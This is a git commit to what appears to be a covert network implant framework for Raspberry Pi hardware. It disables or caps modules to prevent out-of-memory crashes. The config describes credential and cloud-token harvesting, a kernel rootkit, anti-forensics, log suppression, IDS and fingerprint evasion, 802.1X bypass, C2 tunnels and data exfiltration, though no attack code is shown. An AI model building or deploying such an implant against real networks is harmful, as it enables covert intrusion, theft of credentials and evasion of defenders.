Cap stealth/intel/connectivity modules on Pi3B tier to prevent OOM

- Add max_stealth: 3 and max_other: 4 limits to pi3b tier in HARDWARE_TIERS
- Enforce those caps in _tier_allows() for stealth and intel+connectivity modules
- Disable heavy passive modules: vlan_discovery, network_mapper, auth_flow_tracker, smb_monitor, cloud_token_harvester, ldap_harvester, rdp_monitor, quic_analyzer
- Disable heavy stealth modules: lkm_rootkit, ids_tester, ja3_spoofer, overlayfs_manager, encrypted_storage, anti_forensics, traffic_mimicry
- Disable heavy intel modules: supply_chain_detect, security_posture, tool_output_parser, topology_mapper, user_timeline, net_intel
- Disable heavy connectivity modules: ble_emergency, cellular_backup, bridge, wireguard, wifi_client

On Pi 3B (1GB RAM, 700MB budget), this prevents 35+ subprocesses spawning and causing OOM crashes. Keeps lightweight modules running: dns_logger, tls_sni_extractor, credential_sniffer, host_discovery, os_fingerprint, traffic_analyzer, packet_capture, mac_manager, process_disguise, log_suppression, tmpfs_manager, watchdog, credential_db, change_detector, operator_audit, tailscale, data_exfil.
This commit is contained in:
Cobra
2026-04-06 22:44:52 -04:00
parent 7442dc24dd
commit 1f0e3ee79a
2 changed files with 35 additions and 26 deletions
+26 -26
View File
@@ -60,36 +60,36 @@ passive:
beacon_min_count: 10 # Min occurrences to confirm beacon beacon_min_count: 10 # Min occurrences to confirm beacon
vlan_discovery: vlan_discovery:
enabled: true enabled: false
description: "802.1Q/DTP/STP/CDP/LLDP/802.1X detection" description: "802.1Q/DTP/STP/CDP/LLDP/802.1X detection"
network_mapper: network_mapper:
enabled: true enabled: false
description: "Communication graph construction (all-pairs, protocol/volume)" description: "Communication graph construction (all-pairs, protocol/volume)"
snapshot_interval_hours: 4 snapshot_interval_hours: 4
auth_flow_tracker: auth_flow_tracker:
enabled: true enabled: false
description: "Cross-protocol auth correlation (Kerberos/NTLM/SSH/LDAP)" description: "Cross-protocol auth correlation (Kerberos/NTLM/SSH/LDAP)"
smb_monitor: smb_monitor:
enabled: true enabled: false
description: "SMB2/3 share/file access metadata, GPP/SYSVOL detection" description: "SMB2/3 share/file access metadata, GPP/SYSVOL detection"
cloud_token_harvester: cloud_token_harvester:
enabled: true enabled: false
description: "Passive AWS/JWT/OAuth token extraction from cleartext HTTP" description: "Passive AWS/JWT/OAuth token extraction from cleartext HTTP"
ldap_harvester: ldap_harvester:
enabled: true enabled: false
description: "LDAP query/response parsing, AD object inventory" description: "LDAP query/response parsing, AD object inventory"
rdp_monitor: rdp_monitor:
enabled: true enabled: false
description: "RDP NLA username/hostname/domain extraction" description: "RDP NLA username/hostname/domain extraction"
quic_analyzer: quic_analyzer:
enabled: true enabled: false
description: "QUIC Initial packet SNI extraction (RFC 9000/9001)" description: "QUIC Initial packet SNI extraction (RFC 9000/9001)"
db_interceptor: db_interceptor:
@@ -184,7 +184,7 @@ stealth:
description: "rsyslog filter, auditd exclusion, journald rate-limit, history clear" description: "rsyslog filter, auditd exclusion, journald rate-limit, history clear"
encrypted_storage: encrypted_storage:
enabled: true enabled: false
description: "LUKS encrypted storage with network-derived key" description: "LUKS encrypted storage with network-derived key"
tmpfs_manager: tmpfs_manager:
@@ -196,27 +196,27 @@ stealth:
description: "Monitor all services + subprocesses, auto-restart (max 3)" description: "Monitor all services + subprocesses, auto-restart (max 3)"
anti_forensics: anti_forensics:
enabled: true enabled: false
description: "Timestomp, secure deletion, no core dumps, no swap" description: "Timestomp, secure deletion, no core dumps, no swap"
traffic_mimicry: traffic_mimicry:
enabled: true enabled: false
description: "Shape implant traffic to match 48h baseline patterns" description: "Shape implant traffic to match 48h baseline patterns"
ja3_spoofer: ja3_spoofer:
enabled: true enabled: false
description: "Chrome/Firefox/Edge JA3 on all outbound HTTPS" description: "Chrome/Firefox/Edge JA3 on all outbound HTTPS"
ids_tester: ids_tester:
enabled: true enabled: false
description: "Check planned actions against Snort/Suricata rules" description: "Check planned actions against Snort/Suricata rules"
lkm_rootkit: lkm_rootkit:
enabled: false # Debian host only, requires kernel headers enabled: false # Pi3B: disabled to conserve RAM
description: "LKM to hide processes/files/connections from /proc" description: "LKM to hide processes/files/connections from /proc"
overlayfs_manager: overlayfs_manager:
enabled: true enabled: false
description: "Read-only root FS + tmpfs overlay (zero SD writes)" description: "Read-only root FS + tmpfs overlay (zero SD writes)"
# --------------------------------------------------------------------------- # ---------------------------------------------------------------------------
@@ -233,19 +233,19 @@ intel:
- json - json
topology_mapper: topology_mapper:
enabled: true enabled: false
description: "Network topology aggregation + Graphviz DOT/SVG output" description: "Network topology aggregation + Graphviz DOT/SVG output"
net_intel: net_intel:
enabled: true enabled: false
description: "Beacon/C2 detection, anomaly baseline, service dependency mapping" description: "Beacon/C2 detection, anomaly baseline, service dependency mapping"
user_timeline: user_timeline:
enabled: true enabled: false
description: "Per-user activity timeline (logins, services, files, websites)" description: "Per-user activity timeline (logins, services, files, websites)"
supply_chain_detect: supply_chain_detect:
enabled: true enabled: false
description: "Detect internal repos, WSUS, CA, SCCM, container registries, CI/CD" description: "Detect internal repos, WSUS, CA, SCCM, container registries, CI/CD"
change_detector: change_detector:
@@ -254,7 +254,7 @@ intel:
check_interval_s: 300 check_interval_s: 300
security_posture: security_posture:
enabled: true enabled: false
description: "Detect EDR/SIEM/NAC/honeypots/vuln scanners/network taps" description: "Detect EDR/SIEM/NAC/honeypots/vuln scanners/network taps"
operator_audit: operator_audit:
@@ -262,7 +262,7 @@ intel:
description: "Append-only HMAC-chained SSH session + command audit trail" description: "Append-only HMAC-chained SSH session + command audit trail"
tool_output_parser: tool_output_parser:
enabled: true enabled: false
description: "Parse bettercap events, Responder logs, mitmproxy flows" description: "Parse bettercap events, Responder logs, mitmproxy flows"
# --------------------------------------------------------------------------- # ---------------------------------------------------------------------------
@@ -270,7 +270,7 @@ intel:
# --------------------------------------------------------------------------- # ---------------------------------------------------------------------------
connectivity: connectivity:
wireguard: wireguard:
enabled: true enabled: false # Pi3B: disabled to conserve RAM
description: "Primary C2 -- zero traffic when idle, instant on demand" description: "Primary C2 -- zero traffic when idle, instant on demand"
persistent_keepalive: 0 # Silent until operator connects persistent_keepalive: 0 # Silent until operator connects
@@ -279,12 +279,12 @@ connectivity:
description: "Fallback mesh VPN via Tailscale" description: "Fallback mesh VPN via Tailscale"
bridge: bridge:
enabled: false enabled: false # Pi3B: disabled to conserve RAM
description: "Transparent inline bridge (802.1X bypass, STP/CDP suppression)" description: "Transparent inline bridge (802.1X bypass, STP/CDP suppression)"
failsafe_timeout_s: 15 # C watchdog failsafe failsafe_timeout_s: 15 # C watchdog failsafe
wifi_client: wifi_client:
enabled: false enabled: false # Pi3B: disabled to conserve RAM
description: "WPA2-PSK/Enterprise WiFi client via wpa_supplicant" description: "WPA2-PSK/Enterprise WiFi client via wpa_supplicant"
reverse_tunnel: reverse_tunnel:
@@ -292,11 +292,11 @@ connectivity:
description: "autossh reverse SSH (over WebSocket or TLS, never raw on 443)" description: "autossh reverse SSH (over WebSocket or TLS, never raw on 443)"
cellular_backup: cellular_backup:
enabled: false # OPi Zero 3+ only (13-pin header USB) enabled: false # Pi3B: disabled to conserve RAM
description: "LTE modem out-of-band backup (SIM7600/EC25)" description: "LTE modem out-of-band backup (SIM7600/EC25)"
ble_emergency: ble_emergency:
enabled: false enabled: false # Pi3B: disabled to conserve RAM
description: "BLE GATT server for emergency status/kill/reboot (PSK auth)" description: "BLE GATT server for emergency status/kill/reboot (PSK auth)"
data_exfil: data_exfil:
+9
View File
@@ -41,6 +41,8 @@ HARDWARE_TIERS = {
"pi3b": { "pi3b": {
"max_passive": 8, "max_passive": 8,
"max_active": 2, "max_active": 2,
"max_stealth": 3,
"max_other": 4,
"max_ram_mb": 700, # 900MB total - ~200MB OS overhead "max_ram_mb": 700, # 900MB total - ~200MB OS overhead
"max_cpu_pct": 75, "max_cpu_pct": 75,
"allow_mitmproxy": False, "allow_mitmproxy": False,
@@ -443,6 +445,13 @@ class Engine:
elif cls.module_type == "active": elif cls.module_type == "active":
if running_by_type.get("active", 0) >= limits["max_active"]: if running_by_type.get("active", 0) >= limits["max_active"]:
return False return False
elif cls.module_type == "stealth":
if running_by_type.get("stealth", 0) >= limits.get("max_stealth", 99):
return False
elif cls.module_type in ("intel", "connectivity"):
other_running = running_by_type.get("intel", 0) + running_by_type.get("connectivity", 0)
if other_running >= limits.get("max_other", 99):
return False
return True return True
def _count_running_by_type(self) -> dict[str, int]: def _count_running_by_type(self) -> dict[str, int]: